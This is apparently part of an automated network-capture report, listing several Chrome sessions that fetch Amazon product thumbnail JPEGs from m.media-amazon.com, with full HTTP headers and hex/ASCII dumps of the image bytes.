                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                114192.168.2.449993151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC378OUTGET /images/I/41Zp3xaXvPL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC675INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 4810
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 77dcf66f-9438-4933-9f14-43fd62af47d2
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 07 May 2024 20:39:32 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                Expires: Mon, 01 Aug 2044 11:38:28 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 524710
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:39 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100067-IAD, cache-ewr18138-EWR
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 07 08 06 09 03 04 05 01 02 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b9 60 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"3`
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC1378INData Raw: ec 69 83 eb e2 ef d6 fb e5 d8 e2 3d 4a 8d 71 55 30 8a 8d 44 29 9a be 55 16 c5 55 4d 86 a6 5b 39 d4 f4 ea e5 72 aa 35 1a 96 4a 83 fb 1a 60 fa e8 bb f5 de f9 76 28 cd 42 8a eb 36 e2 be ea aa 27 d9 6c 43 ff 00 25 4d 5a 30 4b dd 33 41 13 18 ab bd 62 b5 3c 3d 4a 87 0d 5f ca 86 0d ae 8b bf 5f ef 9b 62 8d d4 29 57 26 48 c6 90 30 9e a7 2f d1 b1 46 e5 5e 94 f4 79 3a 89 1e 59 1f 9f ac 5e 16 b5 10 75 43 5c 3a a9 90 e6 56 e0 9d 6b 61 ef d7 fb e6 d8 a3 35 0a 57 3a ee 6b 48 9b 99 6c 49 3d ae d6 41 4a a4 14 e8 c4 4d 95 5f 8e 64 72 61 ad 6b d8 b1 ba 4c 39 3f c3 e8 d5 0a 88 3a 98 26 b6 1e fe 21 a8 9b 62 91 75 a9 24 72 cd 2a e5 6b b3 7d 23 82 04 8e c4 6f 44 f0 d9 90 7d 42 15 92 5f a9 42 ec b3 ca 83 a4 25 78 ff 00 b4 8d 30 6d 74 5d fc 47 51 36 c5 1a ec 93 aa 99 98 89 65 4a
                                                                                                                                                                                                                                                                Data Ascii: i=JqU0D)UUM[9r5J`v(B6'lC%MZ0K3Ab<=J__b)W&H0/F^y:Y^uC\:Vka5W:kHlI=AJM_drakL9?:&!bu$r*k}#oD}B_B%x0mt]GQ6eJ
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC1378INData Raw: f1 57 5e 9d 1c d5 06 a8 f1 5a 48 0c 9c b7 64 58 87 66 38 03 aa f7 17 b6 35 08 5f 52 3f c8 b4 7b 65 5d c3 9e 3d fa 74 73 54 9a a0 65 c1 c2 98 b8 07 74 23 67 eb fc dc 38 ea ab d8 73 c5 bd e0 39 a2 6a b7 a3 88 c8 dc 00 d4 21 c9 c0 39 4c b2 80 ba 78 8d 9c d1 50 60 53 6a 0e 60 bb 9b b2 08 28 38 0b 0d 54 a8 e3 9e 34 4e a4 2a 5d 56 13 d8 2c 2d 00 0e e4 e2 55 8e 21 8b 3d a0 7b ef 63 06 bd 01 11 dc 28 92 72 6f 8e d3 e9 3c f4 65 32 1e 3c 1c c5 dc fb 1f f0 36 1f 04 48 42 c8 5e 0e e0 81 84 82 23 82 91 68 0b c0 5e 0a 68 2b 1a 4d f6 6f 50 7a f0 42 3f 26 dc 79 0a 84 9c ff 00 11 1c 0c 84 f9 44 17 68 ae 31 29 0a 98 e7 89 63 a9 89 b8 56 e5 45 0d 01 65 88 45 7d 93 74 00 f6 43 9c 46 a9 9a 07 18 ca 74 d9 07 cd 86 a2 84 c5 91 72 05 da 05 9d 14 2a 63 9e 2d c7 01 c2 b3 a6 4a 25
                                                                                                                                                                                                                                                                Data Ascii: W^ZHdXf85_R?{e]=tsTet#g8s9j!9LxP`Sj`(8T4N*]V,-U!={c(ro<e2<6HB^#h^h+MoPzB?&yDh1)cVEeE}tCFtr*c-J%
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC676INData Raw: 45 7c c6 6c 8d 31 2c db b7 68 13 ad 23 73 43 7d 35 ef 00 1a 2b 18 bc b9 c2 ea d1 fb 60 c1 e4 75 87 0f 58 52 94 d7 72 df 88 72 31 57 df f0 29 d5 70 37 e4 93 33 b7 91 30 90 5c 81 a8 18 bd d3 f9 02 23 19 14 f9 21 e4 f5 44 20 86 8b 35 da 14 2d eb 74 77 d9 d4 5f 1d 4d 98 f9 38 3c 69 7f 61 02 06 81 31 bf 54 3f 81 6e ae 0e 7c 82 58 20 60 f4 8b 0c e6 ea 07 4c 4e 7a 80 e9 15 91 0e 9c 23 4c 3e e4 a7 23 be 06 78 28 d9 86 da d2 2d 27 c5 32 93 7e 92 82 9a 76 25 f3 4d e0 40 03 00 50 4a 60 3d c7 c7 f0 07 74 4f 67 e6 11 d4 f2 dd 72 97 d6 11 2b dd 69 fd b0 e3 88 aa b9 c9 ae a1 5f b1 e6 43 6d d9 b8 db 46 ef 35 d5 79 ac 52 11 7e fc 5a 82 d7 f4 45 ab 84 5c d4 d0 06 01 b9 53 51 e5 68 52 b0 02 82 a8 09 49 cc 25 03 28 a4 ce fd 7c e8 82 c7 c8 38 58 13 de a2 1b 6e aa fa 8f 98 cd
                                                                                                                                                                                                                                                                Data Ascii: E|l1,h#sC}5+`uXRrr1W)p730\#!D 5-tw_M8<ia1T?n|X `LNz#L>#x(-'2~v%M@PJ`=tOgr+i_CmF5yR~ZE\SQhRI%(|8Xn


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                115192.168.2.449995151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC378OUTGET /images/I/31+4pNVeyCL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC674INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 5483
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 24ae8e7a-7f35-4056-98d8-a956608b972a
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 19 Feb 2024 12:42:05 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                Expires: Fri, 22 Jul 2044 11:39:16 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 850346
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:39 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100044-IAD, cache-ewr18143-EWR
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 04 03 05 06 07 02 08 09 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ee 58 00 00 00 00 00 00 00 1f 0f af 9f 40
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4X@
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC1378INData Raw: 51 fe 1a 8f 6c 51 c9 6b b7 93 22 22 dd a5 46 2f 2c 60 91 f7 74 7f f8 2f ed cd bd d5 1f d4 b5 5e 2a 9d a9 13 aa 25 5c f9 17 3e 45 cf 91 31 f2 c8 6c 0c 35 0b 2c 88 47 21 d1 e5 ed d7 3b 96 77 2c ce 59 9c b3 39 61 df d4 cd 4f 36 41 f7 5c db 26 3b 32 a4 dd aa f0 ba 46 b7 5a 8a 96 96 3d a2 5a 47 30 d9 72 4a e5 2e 52 63 1c 0d c4 33 c8 08 0e 91 cf 71 37 69 7d be 8b 5d ef 21 59 16 55 65 94 fa c3 1b 79 7e e4 f6 80 45 46 a9 37 aa bc 1d 6e 69 33 a1 2d d1 72 96 9f 3a 75 0b 90 a2 70 5d 23 81 ba e9 9e db dc c4 e4 5b 6e 16 ba e5 ae 53 56 46 a3 64 4a c3 6d ce fb 97 43 c1 ca 1d 0a a4 de aa ef 76 85 35 cb aa c8 6c 84 c4 a9 aa 44 42 e7 ae 0b ad 0b ac 08 4d 9f 47 bd 3a 45 7b f0 ba ba ba 3c 28 77 d8 a6 d0 a7 2b 28 85 95 26 ed 57 83 da 9b 50 a2 3f c8 55 ba 05 00 07 35 dd 65 2b
                                                                                                                                                                                                                                                                Data Ascii: QlQk""F/,`t/^*%\>E1l5,G!;w,Y9aO6A\&;2FZ=ZG0rJ.Rc3q7i}]!YUey~EF7ni3-r:up]#[nSVFdJmCv5lDBMG:E{<(w+(&WP?U5e+
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC1378INData Raw: 36 6a 9d 07 30 9d d3 67 f2 64 1f af f0 66 2c 8f a2 ba 0a 04 4d aa fa 32 3d 17 f6 49 54 89 6f bc fe 07 7c 5e c3 9f c1 7c 0f 7d b4 5e bc 0d c7 2f d6 15 dc d1 21 73 57 d5 9f b0 82 46 fd 8f 97 62 b9 b1 76 a7 31 7c f1 3c c6 83 f6 be 8f 78 c3 8d 1b 28 52 87 92 65 c8 7b ce 69 50 b6 bf a4 c8 9a 2b 8d cd f8 df 62 a9 7b b2 5e c0 f7 3b 7d 10 1a 83 79 b1 a8 cf 39 8d 73 eb 0d e6 fc e1 fc 09 d1 0a 84 8e 90 99 5b bf df e9 16 5b e2 7c 66 98 9b 63 93 f8 19 29 7f 9c 0a 4c 78 18 ff 00 c8 8d 1c 8f 13 cb 69 89 b5 bd 94 f3 a5 18 fa 69 b6 22 2b d0 4d 18 ca e8 42 be 83 c5 c9 8f 03 1e 3a c2 76 9e 27 86 d3 13 55 3b a9 e6 a4 98 b0 d1 8f 0e 4c 78 18 f0 de 2c 27 61 e2 78 2d 31 75 8c 63 1e 14 98 f0 31 e1 bc 58 5e c3 c4 f3 5a 62 eb 18 c6 3c 29 31 e0 63 c3 78 b0 bd 87 89 e2 f4 1b a7 1c
                                                                                                                                                                                                                                                                Data Ascii: 6j0gdf,M2=ITo|^|}^/!sWFbv1|<x(Re{iP+b{^;}y9s[[|fc)Lxii"+MB:v'U;Lx,'ax-1uc1X^Zb<)1cx
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC1349INData Raw: 1f e0 8a 7e 2e a2 3e f7 9d ff 00 d2 ee 8b eb 70 8a 60 43 d0 10 f0 01 c8 08 81 15 a8 e3 fc 28 ea 3f c1 3d e4 7e 69 fe e7 74 5f 7b 84 51 c7 1c 71 c7 e3 8a bc 2b c4 2e e4 5e 6d fe 8f 74 5f 63 84 51 c7 1c 71 f8 71 51 f8 1f 81 78 1e ea 2f 36 ff 00 5d ba 7d 27 87 80 e3 8e 38 e2 9a a8 ff 00 24 87 b9 e7 2f f5 1b e2 fb 1c 22 8e 38 e3 f0 b9 2a fc fa 7c 9e 74 ff 00 69 be 2f b3 c2 28 e2 8e 3f 0b f2 2f 70 f9 3c e5 fe b7 7c 5f 57 84 71 c5 1c 71 c7 2e 5f 87 51 c7 9c be ef 9c bf d1 ef 8b ea 70 8e 38 e2 8e 3f cb 11 b8 e6 a4 7d df 39 7f b3 df 1f dd e1 14 71 45 e4 c4 86 e6 a6 3e ef 9c bb af a3 9c 60 ed e7 bb 4f 59 ee c5 17 88 4a 45 02 9e bf 3f a9 96 7c 5a 9c 23 60 28 0d e6 e6 c0 9b 02 6c 09 b4 3b 4d 81 da 03 62 2b 06 57 04 62 81 1a 05 b8 57 bc a0 f8 a1 56 03 12 83 9c 66 40
                                                                                                                                                                                                                                                                Data Ascii: ~.>p`C(?=~it_{Qq+.^mt_cQqqQx/6]}'8$/"8*|ti/(?/p<|_Wqq._Qp8?}9qE>`OYJE?|Z#`(l;Mb+WbWVf@


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                116192.168.2.44999218.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC611OUTGET /images/I/41E6wo15qgL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 6396
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: ec6aa47d-7870-4edd-b9e8-6cd01347a084
                                                                                                                                                                                                                                                                Date: Tue, 16 Jul 2024 18:48:48 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Wed, 31 Aug 2022 09:36:44 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-696,/images/I/41E6wo15qgL
                                                                                                                                                                                                                                                                Expires: Mon, 11 Jul 2044 18:48:48 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-696 /images/I/41E6wo15qgL
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 fa63af50c0e4f34ddecf2b2d0dca224e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 217519
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: ZXJ9CBcYyI7VEOTGBll7mX6LcXfM-5L_P6FtgF_GEX_ZRNfeXp0dIw==
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC6396INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 01 02 04 05 07 03 08 09 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fb 2c 00 00 2d 2e 6b 68 9b 36 b2 86 d1
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"5,-.kh6


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                117192.168.2.44999418.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC611OUTGET /images/I/317I8lSNZAL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC816INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 5698
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: f5797c58-34ba-485b-81b5-641fac801844
                                                                                                                                                                                                                                                                Date: Sat, 10 Aug 2024 22:31:18 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Sat, 13 Jul 2024 06:26:38 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-528,/images/I/317I8lSNZAL
                                                                                                                                                                                                                                                                Expires: Fri, 05 Aug 2044 22:31:18 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-528 /images/I/317I8lSNZAL
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 c0f1616474eb5ab66a150ca4467bd724.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 12787
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 4Vd5kuHy0qbIHKHW2vNJA08gUfl8jtNCuehVFrAGljoZFu5Jma3ppQ==
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC5698INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 04 05 06 07 02 03 09 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 99 60 00 00 00 00 00 0e 3a d6 5d 98 b0 df
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4`:]


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                118192.168.2.449997151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC378OUTGET /images/I/41C6hPvag5L._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:39 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 7731
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 2545cf61-f153-487c-860d-093703b8ba66
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Wed, 10 Jan 2024 14:18:35 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                Expires: Wed, 22 Jun 2044 19:11:14 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:39 GMT
                                                                                                                                                                                                                                                                Age: 549274
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200102-IAD, cache-nyc-kteb1890072-NYC
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
